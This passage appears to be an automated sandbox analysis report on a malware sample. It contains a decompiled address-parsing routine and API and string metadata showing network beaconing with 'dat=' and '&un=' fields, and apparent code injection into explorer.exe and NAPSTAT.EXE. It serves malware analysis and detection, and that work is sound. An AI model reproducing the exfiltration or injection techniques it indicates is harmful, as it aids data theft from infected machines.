                                                                                                                                                              0x00000000

                                                                                                                                                              Strings
                                                                                                                                                              • RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu, xrefs: 009A24BD
                                                                                                                                                              • RTL: Enter Critical Section Timeout (%I64u secs) %d, xrefs: 009A248D
                                                                                                                                                              • RTL: Re-Waiting, xrefs: 009A24FA
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000006.00000002.2203624657.0000000000930000.00000040.00000001.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                              • Associated: 00000006.00000002.2203612094.0000000000920000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203719368.0000000000A10000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203724457.0000000000A20000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203728871.0000000000A24000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203733148.0000000000A27000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203744469.0000000000A30000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203809294.0000000000A90000.00000040.00000001.sdmp Download File
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: RTL: Enter Critical Section Timeout (%I64u secs) %d$RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu$RTL: Re-Waiting
                                                                                                                                                              • API String ID: 0-3177188983
                                                                                                                                                              • Opcode ID: 716664a2de8f379c7a40c8a30663667c855851cc38bcfceeb370f84418d988e8
                                                                                                                                                              • Instruction ID: 0f7112c48f5a63cc697ce5fcb88013c837702b91196fcdbc8bc7da9f27ec3c52
                                                                                                                                                              • Opcode Fuzzy Hash: 716664a2de8f379c7a40c8a30663667c855851cc38bcfceeb370f84418d988e8
                                                                                                                                                              • Instruction Fuzzy Hash: 7341F370A04204AFDB24EF6CCC85F6E77E8EF89720F208A15F5559B2D1D739E9418BA1
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 0097FCC9, Relevance: 6.3, APIs: 4, Instructions: 257COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                              			E0097FCC9(signed short* _a4, char _a7, signed short** _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _t105;
				void* _t110;
				char _t114;
				short _t115;
				void* _t118;
				signed short* _t119;
				short _t120;
				char _t122;
				void* _t127;
				void* _t130;
				signed int _t136;
				intOrPtr _t143;
				signed int _t158;
				signed short* _t164;
				signed int _t167;
				void* _t170;

				_t158 = 0;
				_t164 = _a4;
				_v20 = 0;
				_v24 = 0;
				_v8 = 0;
				_v12 = 0;
				_v16 = 0;
				_v28 = 0;
				_t136 = 0;
				while(1) {
					_t167 =  *_t164 & 0x0000ffff;
					if(_t167 == _t158) {
						break;
					}
					_t118 = _v20 - _t158;
					if(_t118 == 0) {
						if(_t167 == 0x3a) {
							if(_v12 > _t158 || _v8 > _t158) {
								break;
							} else {
								_t119 =  &(_t164[1]);
								if( *_t119 != _t167) {
									break;
								}
								_t143 = 2;
								 *((short*)(_a12 + _t136 * 2)) = 0;
								_v28 = 1;
								_v8 = _t143;
								_t136 = _t136 + 1;
								L47:
								_t164 = _t119;
								_v20 = _t143;
								L14:
								if(_v24 == _t158) {
									L19:
									_t164 =  &(_t164[1]);
									_t158 = 0;
									continue;
								}
								if(_v12 == _t158) {
									if(_v16 > 4) {
										L29:
										return 0xc000000d;
									}
									_t120 = E0097EE02(_v24, _t158, 0x10);
									_t170 = _t170 + 0xc;
									 *((short*)(_a12 + _t136 * 2)) = _t120;
									_t136 = _t136 + 1;
									goto L19;
								}
								if(_v16 > 3) {
									goto L29;
								}
								_t122 = E0097EE02(_v24, _t158, 0xa);
								_t170 = _t170 + 0xc;
								if(_t122 > 0xff) {
									goto L29;
								}
								 *((char*)(_v12 + _t136 * 2 + _a12 - 1)) = _t122;
								goto L19;
							}
						}
						L21:
						if(_v8 > 7 || _t167 >= 0x80) {
							break;
						} else {
							if(E0097685D(_t167, 4) == 0) {
								if(E0097685D(_t167, 0x80) != 0) {
									if(_v12 > 0) {
										break;
									}
									_t127 = 1;
									_a7 = 1;
									_v24 = _t164;
									_v20 = 1;
									_v16 = 1;
									L36:
									if(_v20 == _t127) {
										goto L19;
									}
									_t158 = 0;
									goto L14;
								}
								break;
							}
							_a7 = 0;
							_v24 = _t164;
							_v20 = 1;
							_v16 = 1;
							goto L19;
						}
					}
					_t130 = _t118 - 1;
					if(_t130 != 0) {
						if(_t130 == 1) {
							goto L21;
						}
						_t127 = 1;
						goto L36;
					}
					if(_t167 >= 0x80) {
						L7:
						if(_t167 == 0x3a) {
							_t158 = 0;
							if(_v12 > 0 || _v8 > 6) {
								break;
							} else {
								_t119 =  &(_t164[1]);
								if( *_t119 != _t167) {
									_v8 = _v8 + 1;
									L13:
									_v20 = _t158;
									goto L14;
								}
								if(_v28 != 0) {
									break;
								}
								_v28 = _v8 + 1;
								_t143 = 2;
								_v8 = _v8 + _t143;
								goto L47;
							}
						}
						if(_t167 != 0x2e || _a7 != 0 || _v12 > 2 || _v8 > 6) {
							break;
						} else {
							_v12 = _v12 + 1;
							_t158 = 0;
							goto L13;
						}
					}
					if(E0097685D(_t167, 4) != 0) {
						_v16 = _v16 + 1;
						goto L19;
					}
					if(E0097685D(_t167, 0x80) != 0) {
						_v16 = _v16 + 1;
						if(_v12 > 0) {
							break;
						}
						_a7 = 1;
						goto L19;
					}
					goto L7;
				}
				 *_a8 = _t164;
				if(_v12 != 0) {
					if(_v12 != 3) {
						goto L29;
					}
					_v8 = _v8 + 1;
				}
				if(_v28 != 0 || _v8 == 7) {
					if(_v20 != 1) {
						if(_v20 != 2) {
							goto L29;
						}
						 *((short*)(_a12 + _t136 * 2)) = 0;
						L65:
						_t105 = _v28;
						if(_t105 != 0) {
							_t98 = (_t105 - _v8) * 2; // 0x11
							E00958980(_a12 + _t98 + 0x10, _a12 + _t105 * 2, _v8 - _t105 + _v8 - _t105);
							_t110 = 8;
							E0094DFC0(_a12 + _t105 * 2, 0, _t110 - _v8 + _t110 - _v8);
						}
						return 0;
					}
					if(_v12 != 0) {
						if(_v16 > 3) {
							goto L29;
						}
						_t114 = E0097EE02(_v24, 0, 0xa);
						_t170 = _t170 + 0xc;
						if(_t114 > 0xff) {
							goto L29;
						}
						 *((char*)(_v12 + _t136 * 2 + _a12)) = _t114;
						goto L65;
					}
					if(_v16 > 4) {
						goto L29;
					}
					_t115 = E0097EE02(_v24, 0, 0x10);
					_t170 = _t170 + 0xc;
					 *((short*)(_a12 + _t136 * 2)) = _t115;
					goto L65;
				} else {
					goto L29;
				}
			}

























                                                                                                                                                              0x0097fcd1
                                                                                                                                                              0x0097fcd6
                                                                                                                                                              0x0097fcd9
                                                                                                                                                              0x0097fcdc
                                                                                                                                                              0x0097fcdf
                                                                                                                                                              0x0097fce2
                                                                                                                                                              0x0097fce5
                                                                                                                                                              0x0097fce8
                                                                                                                                                              0x0097fceb
                                                                                                                                                              0x0097fced
                                                                                                                                                              0x0097fced
                                                                                                                                                              0x0097fcf3
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0097fcfc
                                                                                                                                                              0x0097fcfe
                                                                                                                                                              0x0097fdc1
                                                                                                                                                              0x009aecbd
                                                                                                                                                              0x00000000
                                                                                                                                                              0x009aeccc
                                                                                                                                                              0x009aeccc
                                                                                                                                                              0x009aecd2
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x009aecdf
                                                                                                                                                              0x009aece0
                                                                                                                                                              0x009aece4
                                                                                                                                                              0x009aeceb
                                                                                                                                                              0x009aecee
                                                                                                                                                              0x009aeca8
                                                                                                                                                              0x009aeca8
                                                                                                                                                              0x009aecaa
                                                                                                                                                              0x0097fd76
                                                                                                                                                              0x0097fd79
                                                                                                                                                              0x0097fdb4
                                                                                                                                                              0x0097fdb5
                                                                                                                                                              0x0097fdb6
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0097fdb6
                                                                                                                                                              0x0097fd7e
                                                                                                                                                              0x009aecfc
                                                                                                                                                              0x0097fe2f
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0097fe2f
                                                                                                                                                              0x009aed08
                                                                                                                                                              0x009aed0f
                                                                                                                                                              0x009aed17
                                                                                                                                                              0x009aed1b
                                                                                                                                                              0x00000000
                                                                                                                                                              0x009aed1b
                                                                                                                                                              0x0097fd88
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0097fd94
                                                                                                                                                              0x0097fd99
                                                                                                                                                              0x0097fda1
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0097fdb0
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0097fdb0
                                                                                                                                                              0x009aecbd
                                                                                                                                                              0x0097fdc7
                                                                                                                                                              0x0097fdcb
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0097fdd7
                                                                                                                                                              0x0097fde3
                                                                                                                                                              0x0097fe06
                                                                                                                                                              0x00991fe7
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00991fef
                                                                                                                                                              0x00991ff0
                                                                                                                                                              0x00991ff4
                                                                                                                                                              0x00991ff7
                                                                                                                                                              0x00991ffa
                                                                                                                                                              0x00991ffd
                                                                                                                                                              0x00992000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x009aecf1
                                                                                                                                                              0x00000000
                                                                                                                                                              0x009aecf1
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0097fe06
                                                                                                                                                              0x0097fde8
                                                                                                                                                              0x0097fdec
                                                                                                                                                              0x0097fdef
                                                                                                                                                              0x0097fdf2
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0097fdf2
                                                                                                                                                              0x0097fdcb
                                                                                                                                                              0x0097fd04
                                                                                                                                                              0x0097fd05
                                                                                                                                                              0x009aec67
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x009aec6f
                                                                                                                                                              0x00000000
                                                                                                                                                              0x009aec6f
                                                                                                                                                              0x0097fd13
                                                                                                                                                              0x0097fd3c
                                                                                                                                                              0x0097fd40
                                                                                                                                                              0x009aec75
                                                                                                                                                              0x009aec7a
                                                                                                                                                              0x00000000
                                                                                                                                                              0x009aec8a
                                                                                                                                                              0x009aec8a
                                                                                                                                                              0x009aec90
                                                                                                                                                              0x009aecb2
                                                                                                                                                              0x0097fd73
                                                                                                                                                              0x0097fd73
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0097fd73
                                                                                                                                                              0x009aec95
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x009aeca1
                                                                                                                                                              0x009aeca4
                                                                                                                                                              0x009aeca5
                                                                                                                                                              0x00000000
                                                                                                                                                              0x009aeca5
                                                                                                                                                              0x009aec7a
                                                                                                                                                              0x0097fd4a
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0097fd6e
                                                                                                                                                              0x0097fd6e
                                                                                                                                                              0x0097fd71
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0097fd71
                                                                                                                                                              0x0097fd4a
                                                                                                                                                              0x0097fd21
                                                                                                                                                              0x0098a3a1
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0098a3a1
                                                                                                                                                              0x0097fd36
                                                                                                                                                              0x0099200b
                                                                                                                                                              0x00992012
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00992018
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00992018
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0097fd36
                                                                                                                                                              0x0097fe0f
                                                                                                                                                              0x0097fe16
                                                                                                                                                              0x0098a3ad
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0098a3b3
                                                                                                                                                              0x0098a3b3
                                                                                                                                                              0x0097fe1f
                                                                                                                                                              0x009aed25
                                                                                                                                                              0x009aed86
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x009aed91
                                                                                                                                                              0x009aed95
                                                                                                                                                              0x009aed95
                                                                                                                                                              0x009aed9a
                                                                                                                                                              0x009aedad
                                                                                                                                                              0x009aedb3
                                                                                                                                                              0x009aedba
                                                                                                                                                              0x009aedc4
                                                                                                                                                              0x009aedc9
                                                                                                                                                              0x00000000
                                                                                                                                                              0x009aedcc
                                                                                                                                                              0x009aed2a
                                                                                                                                                              0x009aed55
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x009aed61
                                                                                                                                                              0x009aed66
                                                                                                                                                              0x009aed6e
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x009aed7d
                                                                                                                                                              0x00000000
                                                                                                                                                              0x009aed7d
                                                                                                                                                              0x009aed30
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x009aed3c
                                                                                                                                                              0x009aed43
                                                                                                                                                              0x009aed4b
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000

                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000006.00000002.2203624657.0000000000930000.00000040.00000001.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                              • Associated: 00000006.00000002.2203612094.0000000000920000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203719368.0000000000A10000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203724457.0000000000A20000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203728871.0000000000A24000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203733148.0000000000A27000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203744469.0000000000A30000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203809294.0000000000A90000.00000040.00000001.sdmp Download File
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: __fassign
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3965848254-0
                                                                                                                                                              • Opcode ID: cf2859dc65627fbf80b6c0eada531fd5cb93d2a8787631212c3d4041a421bf55
                                                                                                                                                              • Instruction ID: 4ad579823a9febcb5ed7d2e86e0bde68c128be32bef663ed82efdb4a339ab780
                                                                                                                                                              • Opcode Fuzzy Hash: cf2859dc65627fbf80b6c0eada531fd5cb93d2a8787631212c3d4041a421bf55
                                                                                                                                                              • Instruction Fuzzy Hash: 7E918E32D0020AEBDF24DF98C8556AEB7B8EF95314F24C47AD459B61A2E7305A81CB91
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Analysis Process: explorer.exe PID: 1388 Parent PID: 960 explorer.exeCOMMON

                                                                                                                                                              Executed Functions

                                                                                                                                                              Function 02933302, Relevance: 23.7, APIs: 3, Strings: 10, Instructions: 911networkCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000007.00000002.2394027710.0000000002910000.00000040.00000001.sdmp, Offset: 02910000, based on PE: false
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: getaddrinforecvsetsockopt
                                                                                                                                                              • String ID: Co$&br=$&un=$: cl$=$GET $dat=$nnec$ose$tion
                                                                                                                                                              • API String ID: 1564272048-2976227712
                                                                                                                                                              • Opcode ID: b31e8b864956b6b4abfa9b859ad4291af29cc5130ca763e476aa0a2d5a1583bf
                                                                                                                                                              • Instruction ID: 0baef6d72ab4ce6d7596f3bc5c08b8816e7bcbf7b9ae85570f12b4ba1a3e79c2
                                                                                                                                                              • Opcode Fuzzy Hash: b31e8b864956b6b4abfa9b859ad4291af29cc5130ca763e476aa0a2d5a1583bf
                                                                                                                                                              • Instruction Fuzzy Hash: E2627230618B088BC76AEF68D4847EAB7E6FF94304F504A2ED59BC7242DF30A545CB85
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 0292FE7E, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52networkCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000007.00000002.2394027710.0000000002910000.00000040.00000001.sdmp, Offset: 02910000, based on PE: false
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: connect
                                                                                                                                                              • String ID: conn$ect
                                                                                                                                                              • API String ID: 1959786783-716201944
                                                                                                                                                              • Opcode ID: fb95bafb82b3473d6ef4390d0af350634b81bde5baa335949624609cad2727e7
                                                                                                                                                              • Instruction ID: 6bba3cc8f5ef201af7f42e9cba21e2c5ee4ea690133f1ad3d9690f8455b1af87
                                                                                                                                                              • Opcode Fuzzy Hash: fb95bafb82b3473d6ef4390d0af350634b81bde5baa335949624609cad2727e7
                                                                                                                                                              • Instruction Fuzzy Hash: 94012C70618A188FDB84EF5CE488B15BBE0EB59314F1545EEE90DCB267CBB4CC858B85
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 0292FE82, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 51networkCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000007.00000002.2394027710.0000000002910000.00000040.00000001.sdmp, Offset: 02910000, based on PE: false
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: connect
                                                                                                                                                              • String ID: conn$ect
                                                                                                                                                              • API String ID: 1959786783-716201944
                                                                                                                                                              • Opcode ID: 26898fd5f90645f94afd46a3ac35e2686c27f416d54a17c3d9a13a012a848fc3
                                                                                                                                                              • Instruction ID: caf9ddffff4577125d2e0fffbae3ee0584bfab123249348c02e7a2be980f2b2a
                                                                                                                                                              • Opcode Fuzzy Hash: 26898fd5f90645f94afd46a3ac35e2686c27f416d54a17c3d9a13a012a848fc3
                                                                                                                                                              • Instruction Fuzzy Hash: D2012C70618A188FDB84EF5CE488B15B7E0EB58314F1541AEA80DCB227CB70C8818B81
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 0292FDF7, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 55networkCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000007.00000002.2394027710.0000000002910000.00000040.00000001.sdmp, Offset: 02910000, based on PE: false
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: send
                                                                                                                                                              • String ID: send
                                                                                                                                                              • API String ID: 2809346765-2809346765
                                                                                                                                                              • Opcode ID: 06a0e18ca9c1e1e84b1de7ba9482a901a96b4c92f796fb4ce4398a9b5ac61c15
                                                                                                                                                              • Instruction ID: afad0a8ebb229b36706ce7ade89317062bdcdf0d7c11dda385a36a1cc59c164b
                                                                                                                                                              • Opcode Fuzzy Hash: 06a0e18ca9c1e1e84b1de7ba9482a901a96b4c92f796fb4ce4398a9b5ac61c15
                                                                                                                                                              • Instruction Fuzzy Hash: 0B012130918A188FCB84EF5CA089B1577E0EB98324F1545AE984DCB266CB70D882CB82
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 0292FE02, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 53networkCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000007.00000002.2394027710.0000000002910000.00000040.00000001.sdmp, Offset: 02910000, based on PE: false
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: send
                                                                                                                                                              • String ID: send
                                                                                                                                                              • API String ID: 2809346765-2809346765
                                                                                                                                                              • Opcode ID: 3773d62206420a3ed138edb7b0d1187259b6e4662953c22d04494397483c12ef
                                                                                                                                                              • Instruction ID: 9954aad99ecdf99c9acee3fb68bef2c1d728e7cf246160c92a044d0650529038
                                                                                                                                                              • Opcode Fuzzy Hash: 3773d62206420a3ed138edb7b0d1187259b6e4662953c22d04494397483c12ef
                                                                                                                                                              • Instruction Fuzzy Hash: 74010030618A188FDB84EF1CA488B1577E0EB5C314F1545AE984DCB266CB70D881CB81
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 0292FD02, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 49networkCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000007.00000002.2394027710.0000000002910000.00000040.00000001.sdmp, Offset: 02910000, based on PE: false
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: socket
                                                                                                                                                              • String ID: sock
                                                                                                                                                              • API String ID: 98920635-2415254727
                                                                                                                                                              • Opcode ID: 324350153747078c09b6e059cc1e16611ed0418a95caa11cf7f7e91404692acf
                                                                                                                                                              • Instruction ID: 45a7ed4925cc5cecd4ce2a7bd2bae633bb259e9a925769cc71b40abfbd775971
                                                                                                                                                              • Opcode Fuzzy Hash: 324350153747078c09b6e059cc1e16611ed0418a95caa11cf7f7e91404692acf
                                                                                                                                                              • Instruction Fuzzy Hash: 96014B70658A188FDB84EF1CE048B14BBE0FB98314F1541AEE84DCB376C7B0C9468B86
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 0292B272, Relevance: 1.6, APIs: 1, Instructions: 81COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000007.00000002.2394027710.0000000002910000.00000040.00000001.sdmp, Offset: 02910000, based on PE: false
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Sleep
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3472027048-0
                                                                                                                                                              • Opcode ID: fd57b9079238b9e4bf1c504420f21d1e9a897069bc43c21d39ffc44af76478d5
                                                                                                                                                              • Instruction ID: 05ceb69e1b083b6eaa420ef86a8c5fd7ee944a936d19149dea63c593149b8643
                                                                                                                                                              • Opcode Fuzzy Hash: fd57b9079238b9e4bf1c504420f21d1e9a897069bc43c21d39ffc44af76478d5
                                                                                                                                                              • Instruction Fuzzy Hash: EE216D30614B6D8FCF64EF5880A43AAB3E6FB94308F48067E995DCB20ACF709445CB91
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Non-executed Functions

                                                                                                                                                              Analysis Process: NAPSTAT.EXE PID: 2016 Parent PID: 1388 NAPSTAT.EXECOMMON

                                                                                                                                                              Executed Functions

                                                                                                                                                              Function 008B67C7, Relevance: 11.0, APIs: 5, Strings: 1, Instructions: 487nativeCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • NtQueryInformationProcess.NTDLL ref: 008B691F
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.2390084502.00000000008B0000.00000040.00000001.sdmp, Offset: 008B0000, based on PE: false
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: InformationProcessQuery
                                                                                                                                                              • String ID: 0
                                                                                                                                                              • API String ID: 1778838933-4108050209
                                                                                                                                                              • Opcode ID: 8e12f4b20edd14092c767837b0d6a63fc5fa59451e8ccbfbeb00165e0271d1df
                                                                                                                                                              • Instruction ID: c0824daedadc26238fafc32be395989c64c0e753b5bb88d41637eb3239bf0f36
                                                                                                                                                              • Opcode Fuzzy Hash: 8e12f4b20edd14092c767837b0d6a63fc5fa59451e8ccbfbeb00165e0271d1df
                                                                                                                                                              • Instruction Fuzzy Hash: 7DF10F70518A4C8FDBA9EF6CC895AEEB7E0FB98304F40462EE44AD7251DF349645CB42
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 008B632E, Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 226nativeCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.2390084502.00000000008B0000.00000040.00000001.sdmp, Offset: 008B0000, based on PE: false
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Section$CreateView
                                                                                                                                                              • String ID: @$@
                                                                                                                                                              • API String ID: 1585966358-149943524
                                                                                                                                                              • Opcode ID: 23bbd423bda2d343ab6e972927e2050342c0f7742b38ed2ef85d626af141b225
                                                                                                                                                              • Instruction ID: 2ff1f50f34e74d08dc9e27dc071b24923ac1eaf05fed23447d577640b7d71ea6
                                                                                                                                                              • Opcode Fuzzy Hash: 23bbd423bda2d343ab6e972927e2050342c0f7742b38ed2ef85d626af141b225
                                                                                                                                                              • Instruction Fuzzy Hash: 68617E70618B098FCB58EF6CD8956AABBE0FB98314F50062EE58AC3351DF35D441CB86
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 008B6332, Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 171nativeCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.2390084502.00000000008B0000.00000040.00000001.sdmp, Offset: 008B0000, based on PE: false
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Section$CreateView
                                                                                                                                                              • String ID: @$@
                                                                                                                                                              • API String ID: 1585966358-149943524
                                                                                                                                                              • Opcode ID: a1482434a0a88b71d013ed121938e84fd5f2c3cc8d37ffdd0bde3b1d9f6fd9a4
                                                                                                                                                              • Instruction ID: 195ea6dba98db28f9402f564ccadf5d68e37778505ad502612a8a367414d2621
                                                                                                                                                              • Opcode Fuzzy Hash: a1482434a0a88b71d013ed121938e84fd5f2c3cc8d37ffdd0bde3b1d9f6fd9a4
                                                                                                                                                              • Instruction Fuzzy Hash: D2515C70618B098FC758DF18D8956AABBE0FB98304F50062EE58AC3791DF35D541CB86
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 008B67C2, Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 163nativeCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • NtQueryInformationProcess.NTDLL ref: 008B691F
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.2390084502.00000000008B0000.00000040.00000001.sdmp, Offset: 008B0000, based on PE: false
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: InformationProcessQuery
                                                                                                                                                              • String ID: 0
                                                                                                                                                              • API String ID: 1778838933-4108050209
                                                                                                                                                              • Opcode ID: ee058b3cccb49983a851c3df2d35334e30d543251d26de184eeff105f84e013e
                                                                                                                                                              • Instruction ID: 967f4442c3d5ac9366939b44662b589e7bfa9eb507f9503ba264cfc0611efbbf
                                                                                                                                                              • Opcode Fuzzy Hash: ee058b3cccb49983a851c3df2d35334e30d543251d26de184eeff105f84e013e
                                                                                                                                                              • Instruction Fuzzy Hash: F2513D70918A8C8FDB69EF68C8946EEBBF0FB98304F40462EE44AD7211DF349645CB41
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 001381C0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40filenativeCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • NtCreateFile.NTDLL(00000060,00000000,.z`,00133B97,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,00133B97,007A002E,00000000,00000060,00000000,00000000), ref: 0013820D
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.2389745948.0000000000120000.00000040.00000001.sdmp, Offset: 00120000, based on PE: false
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CreateFile
                                                                                                                                                              • String ID: .z`
                                                                                                                                                              • API String ID: 823142352-1441809116
                                                                                                                                                              • Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                                                                                                                                              • Instruction ID: 4d159b8f656ac3a10ca39228a5f55840f9f971796e861816307a04d863a6266f
                                                                                                                                                              • Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                                                                                                                                              • Instruction Fuzzy Hash: DBF0B6B2200208ABCB08CF88DC85DEB77ADAF8C754F158248FA0D97241C630E8118BA4
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

